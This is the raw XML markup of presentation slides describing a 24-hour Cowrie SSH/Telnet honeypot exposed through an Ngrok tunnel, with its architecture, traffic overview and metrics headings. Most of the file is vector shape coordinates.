                  <a:pt x="19050" y="136475"/>
                  <a:pt x="25450" y="142875"/>
                  <a:pt x="33338" y="142875"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="61912" y="142875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="69800" y="142875"/>
                  <a:pt x="76200" y="136475"/>
                  <a:pt x="76200" y="128588"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76200" y="109537"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76200" y="101650"/>
                  <a:pt x="69800" y="95250"/>
                  <a:pt x="61912" y="95250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57150" y="95250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="95250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109537" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="101650" y="95250"/>
                  <a:pt x="95250" y="101650"/>
                  <a:pt x="95250" y="109537"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="95250" y="128588"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="95250" y="136475"/>
                  <a:pt x="101650" y="142875"/>
                  <a:pt x="109537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109537"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="152400" y="101650"/>
                  <a:pt x="146000" y="95250"/>
                  <a:pt x="138113" y="95250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="133350" y="95250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133350" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161925" y="85725"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="167194" y="85725"/>
                  <a:pt x="171450" y="81469"/>
                  <a:pt x="171450" y="76200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171450" y="70931"/>
                  <a:pt x="167194" y="66675"/>
                  <a:pt x="161925" y="66675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="95250" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95250" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100013" y="57150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="107900" y="57150"/>
                  <a:pt x="114300" y="50750"/>
                  <a:pt x="114300" y="42863"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="114300" y="23813"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="114300" y="15925"/>
                  <a:pt x="107900" y="9525"/>
                  <a:pt x="100013" y="9525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71438" y="9525"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="133350" y="111919"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="135731" y="111919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135731" y="126206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111919" y="126206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111919" y="111919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133350" y="111919"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="57150" y="111919"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="59531" y="111919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59531" y="126206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35719" y="126206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35719" y="111919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="111919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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="2657475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Endpoint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76325" y="2847975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2.tcp.eu.ngrok.io:19596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1025" y="32099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14375" y="33242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56138"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="25122"/>
                  <a:pt x="25598" y="0"/>
                  <a:pt x="57150" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88702" y="0"/>
                  <a:pt x="114300" y="25122"/>
                  <a:pt x="114300" y="56138"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114300" y="91648"/>
                  <a:pt x="78522" y="134213"/>
                  <a:pt x="63579" y="150435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60067" y="154245"/>
                  <a:pt x="54203" y="154245"/>
                  <a:pt x="50691" y="150435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35749" y="134213"/>
                  <a:pt x="-30" y="91648"/>
                  <a:pt x="-30" y="56138"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="57150" y="76200"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="67664" y="76200"/>
                  <a:pt x="76200" y="67664"/>
                  <a:pt x="76200" y="57150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76200" y="46636"/>
                  <a:pt x="67664" y="38100"/>
                  <a:pt x="57150" y="38100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46636" y="38100"/>
                  <a:pt x="38100" y="46636"/>
                  <a:pt x="38100" y="57150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38100" y="67664"/>
                  <a:pt x="46636" y="76200"/>
                  <a:pt x="57150" y="7620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7" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="3190875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Location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6325" y="3381375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Frankfurt, EU Node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1025" y="37433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95325" y="3857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1" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="3724275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76325" y="3914775"/>
            <a:ext cx="695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 Hours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5763" y="4500563"/>
            <a:ext cx="4429125" cy="2295525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4429125" h="2295525">
                <a:moveTo>
                  <a:pt x="76211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352914" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4395004" y="0"/>
                  <a:pt x="4429125" y="34121"/>
                  <a:pt x="4429125" y="76211"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4429125" y="2219314"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4429125" y="2261404"/>
                  <a:pt x="4395004" y="2295525"/>
                  <a:pt x="4352914" y="2295525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76211" y="2295525"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34121" y="2295525"/>
                  <a:pt x="0" y="2261404"/>
                  <a:pt x="0" y="2219314"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="76211"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="34121"/>
                  <a:pt x="34121" y="0"/>
                  <a:pt x="7621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81025" y="4695825"/>
            <a:ext cx="412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&amp; Technologies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85788" y="5081588"/>
            <a:ext cx="4029075" cy="695325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4029075" h="695325">
                <a:moveTo>
                  <a:pt x="38097" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3990978" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4012004" y="0"/>
                  <a:pt x="4029075" y="17071"/>
                  <a:pt x="4029075" y="38097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4029075" y="657228"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4029075" y="678254"/>
                  <a:pt x="4012004" y="695325"/>
                  <a:pt x="3990978" y="695325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38097" y="695325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17071" y="695325"/>
                  <a:pt x="0" y="678254"/>
                  <a:pt x="0" y="657228"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="38097"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17071"/>
                  <a:pt x="17071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04850" y="5200650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Cowrie Honeypot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345632" y="5219700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4850" y="5467350"/>
            <a:ext cx="385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Medium-interaction SSH/Telnet honeypot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85788" y="5900738"/>
            <a:ext cx="4029075" cy="695325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4029075" h="695325">
                <a:moveTo>
                  <a:pt x="38097" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3990978" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4012004" y="0"/>
                  <a:pt x="4029075" y="17071"/>
                  <a:pt x="4029075" y="38097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4029075" y="657228"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4029075" y="678254"/>
                  <a:pt x="4012004" y="695325"/>
                  <a:pt x="3990978" y="695325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38097" y="695325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17071" y="695325"/>
                  <a:pt x="0" y="678254"/>
                  <a:pt x="0" y="657228"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="38097"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17071"/>
                  <a:pt x="17071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704850" y="6019800"/>
            <a:ext cx="981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Ngrok Tunnel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345632" y="6038850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4850" y="6286500"/>
            <a:ext cx="385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tunnel service for public exposure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049143" y="1509713"/>
            <a:ext cx="6753225" cy="5286375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6753225" h="5286375">
                <a:moveTo>
                  <a:pt x="76177" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6677048" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6719120" y="0"/>
                  <a:pt x="6753225" y="34105"/>
                  <a:pt x="6753225" y="76177"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6753225" y="5210198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6753225" y="5252270"/>
                  <a:pt x="6719120" y="5286375"/>
                  <a:pt x="6677048" y="5286375"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76177" y="5286375"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34105" y="5286375"/>
                  <a:pt x="0" y="5252270"/>
                  <a:pt x="0" y="5210198"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="76177"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="34134"/>
                  <a:pt x="34134" y="0"/>
                  <a:pt x="76177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5282505" y="1743075"/>
            <a:ext cx="637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Architecture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287268" y="2166938"/>
            <a:ext cx="2838450" cy="809625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2838450" h="809625">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2800349" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2821392" y="0"/>
                  <a:pt x="2838450" y="17058"/>
                  <a:pt x="2838450" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2838450" y="771524"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2838450" y="792567"/>
                  <a:pt x="2821392" y="809625"/>
                  <a:pt x="2800349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468243" y="24384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7" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796855" y="2324100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Internet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796855" y="2552700"/>
            <a:ext cx="1352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botnet clusters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313390" y="2457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0" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8727728" y="2166938"/>
            <a:ext cx="2838450" cy="809625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2838450" h="809625">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2800349" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2821392" y="0"/>
                  <a:pt x="2838450" y="17058"/>
                  <a:pt x="2838450" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2838450" y="771524"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2838450" y="792567"/>
                  <a:pt x="2821392" y="809625"/>
                  <a:pt x="2800349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8908703" y="24384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2" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9237315" y="2324100"/>
            <a:ext cx="101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Ngrok Relay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237315" y="2552700"/>
            <a:ext cx="100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EU-West region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41965" y="31337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5" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287268" y="3519488"/>
            <a:ext cx="2838450" cy="809625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2838450" h="809625">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2800349" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2821392" y="0"/>
                  <a:pt x="2838450" y="17058"/>
                  <a:pt x="2838450" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2838450" y="771524"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2838450" y="792567"/>
                  <a:pt x="2821392" y="809625"/>
                  <a:pt x="2800349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5456337" y="37909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71438" y="35719"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="71438" y="15999"/>
                  <a:pt x="87437" y="0"/>
                  <a:pt x="107156" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126876" y="0"/>
                  <a:pt x="142875" y="15999"/>
                  <a:pt x="142875" y="35719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="37058"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142875" y="42900"/>
                  <a:pt x="138150" y="47625"/>
                  <a:pt x="132308" y="47625"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="82042" y="47625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76200" y="47625"/>
                  <a:pt x="71475" y="42900"/>
                  <a:pt x="71475" y="37058"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71475" y="35719"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="200025" y="40481"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="203969" y="45727"/>
                  <a:pt x="202890" y="53206"/>
                  <a:pt x="197644" y="57150"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="161255" y="84423"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="163227" y="87734"/>
                  <a:pt x="164716" y="91380"/>
                  <a:pt x="165646" y="95250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="202406" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="208992" y="95250"/>
                  <a:pt x="214313" y="100571"/>
                  <a:pt x="214313" y="107156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214313" y="113742"/>
                  <a:pt x="208992" y="119063"/>
                  <a:pt x="202406" y="119063"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166688" y="119063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166688" y="130969"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166688" y="131936"/>
                  <a:pt x="166650" y="132941"/>
                  <a:pt x="166613" y="133908"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="197644" y="157163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="202890" y="161106"/>
                  <a:pt x="203969" y="168585"/>
                  <a:pt x="200025" y="173831"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196081" y="179077"/>
                  <a:pt x="188602" y="180156"/>
                  <a:pt x="183356" y="176212"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="159879" y="158614"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="151247" y="175059"/>
                  <a:pt x="135136" y="186965"/>
                  <a:pt x="116086" y="189830"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116086" y="104180"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116086" y="99231"/>
                  <a:pt x="112105" y="95250"/>
                  <a:pt x="107156" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102208" y="95250"/>
                  <a:pt x="98227" y="99231"/>
                  <a:pt x="98227" y="104180"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="98227" y="189830"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="79177" y="186965"/>
                  <a:pt x="63066" y="175059"/>
                  <a:pt x="54434" y="158614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="30956" y="176213"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25710" y="180156"/>
                  <a:pt x="18231" y="179077"/>
                  <a:pt x="14288" y="173831"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10344" y="168585"/>
                  <a:pt x="11423" y="161106"/>
                  <a:pt x="16669" y="157163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47699" y="133908"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="47662" y="132941"/>
                  <a:pt x="47625" y="131973"/>
                  <a:pt x="47625" y="130969"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47625" y="119063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11906" y="119063"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5321" y="119063"/>
                  <a:pt x="0" y="113742"/>
                  <a:pt x="0" y="107156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100571"/>
                  <a:pt x="5321" y="95250"/>
                  <a:pt x="11906" y="95250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48667" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49597" y="91380"/>
                  <a:pt x="51085" y="87734"/>
                  <a:pt x="53057" y="84423"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16669" y="57150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11423" y="53206"/>
                  <a:pt x="10344" y="45727"/>
                  <a:pt x="14288" y="40481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18231" y="35235"/>
                  <a:pt x="25710" y="34156"/>
                  <a:pt x="30956" y="38100"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71438" y="68461"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76014" y="66563"/>
                  <a:pt x="81037" y="65484"/>
                  <a:pt x="86320" y="65484"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127992" y="65484"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="133276" y="65484"/>
                  <a:pt x="138299" y="66526"/>
                  <a:pt x="142875" y="68461"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="183356" y="38100"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="188602" y="34156"/>
                  <a:pt x="196081" y="35235"/>
                  <a:pt x="200025" y="40481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47" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796855" y="3676650"/>
            <a:ext cx="134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Cowrie Honeypot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796855" y="3905250"/>
            <a:ext cx="133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2222 (emulated)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313390" y="3810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0" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8727728" y="3519488"/>
            <a:ext cx="2838450" cy="809625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2838450" h="809625">
                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2800349" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2821392" y="0"/>
                  <a:pt x="2838450" y="17058"/>
                  <a:pt x="2838450" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2838450" y="771524"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2838450" y="792567"/>
                  <a:pt x="2821392" y="809625"/>
                  <a:pt x="2800349" y="809625"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="809625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="809625"/>
                  <a:pt x="0" y="792567"/>
                  <a:pt x="0" y="7715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8920609" y="37909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2" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9237315" y="3676650"/>
            <a:ext cx="1133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 Collection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237315" y="3905250"/>
            <a:ext cx="1123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Session recording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287268" y="4491038"/>
            <a:ext cx="6276975" cy="962025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6276975" h="962025">
                <a:moveTo>
                  <a:pt x="38096" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6238879" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6259919" y="0"/>
                  <a:pt x="6276975" y="17056"/>
                  <a:pt x="6276975" y="38096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6276975" y="923929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6276975" y="944969"/>
                  <a:pt x="6259919" y="962025"/>
                  <a:pt x="623887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6366F1">
              <a:alpha val="10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="1270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5425380" y="4686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6" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5677346" y="4648200"/>
            <a:ext cx="580072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High-Visibility Surface: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The global Ngrok relay provided significantly higher exposure to international botnet clusters compared to local network deployment. This configuration enabled capture of diverse attack patterns from geographically distributed threat actors.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7048" y="337048"/>
            <a:ext cx="1215039" cy="274632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1215039" h="274632">
                <a:moveTo>
                  <a:pt x="33288" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1181751" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1200135" y="0"/>
                  <a:pt x="1215039" y="14904"/>
                  <a:pt x="1215039" y="33288"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1215039" y="241344"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1215039" y="259728"/>
                  <a:pt x="1200135" y="274632"/>
                  <a:pt x="1181751" y="274632"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33288" y="274632"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14904" y="274632"/>
                  <a:pt x="0" y="259728"/>
                  <a:pt x="0" y="241344"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33288"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14916"/>
                  <a:pt x="14916" y="0"/>
                  <a:pt x="33288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41076" y="416109"/>
            <a:ext cx="1056917" cy="14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6" b="1" spc="39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24-Hour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2887" y="715708"/>
            <a:ext cx="11725958" cy="399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45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Traffic Overview: Attack Surface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7048" y="1319066"/>
            <a:ext cx="7606476" cy="4735323"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7606476" h="4735323">
                <a:moveTo>
                  <a:pt x="66579" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7539898" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7576668" y="0"/>
                  <a:pt x="7606476" y="29808"/>
                  <a:pt x="7606476" y="66579"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7606476" y="4668744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7606476" y="4705515"/>
                  <a:pt x="7576668" y="4735323"/>
                  <a:pt x="7539898" y="4735323"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66579" y="4735323"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29808" y="4735323"/>
                  <a:pt x="0" y="4705515"/>
                  <a:pt x="0" y="4668744"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66579"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29808"/>
                  <a:pt x="29808" y="0"/>
                  <a:pt x="6657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0942" y="1522960"/>
            <a:ext cx="7273589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Connection Request Timeline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 0" descr="https://kimi-img.moonshot.cn/pub/slides/26-02-06-13:03:49-d62ncdfk67e48o3a0hk0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40942" y="1889136"/>
            <a:ext cx="6175061" cy="2663099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8153660" y="1319066"/>
            <a:ext cx="3703372" cy="3853171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3703372" h="3853171">
                <a:moveTo>
                  <a:pt x="66587" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3636785" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3673560" y="0"/>
                  <a:pt x="3703372" y="29812"/>
                  <a:pt x="3703372" y="66587"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3703372" y="3786585"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3703372" y="3823359"/>
                  <a:pt x="3673560" y="3853171"/>
                  <a:pt x="3636785" y="3853171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66587" y="3853171"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29812" y="3853171"/>
                  <a:pt x="0" y="3823359"/>
                  <a:pt x="0" y="3786585"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66587"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29836"/>
                  <a:pt x="29836" y="0"/>
                  <a:pt x="66587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324265" y="1489671"/>
            <a:ext cx="3437062" cy="2330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Metrics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328426" y="1860008"/>
            <a:ext cx="3353840" cy="973696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3353840" h="973696">
                <a:moveTo>
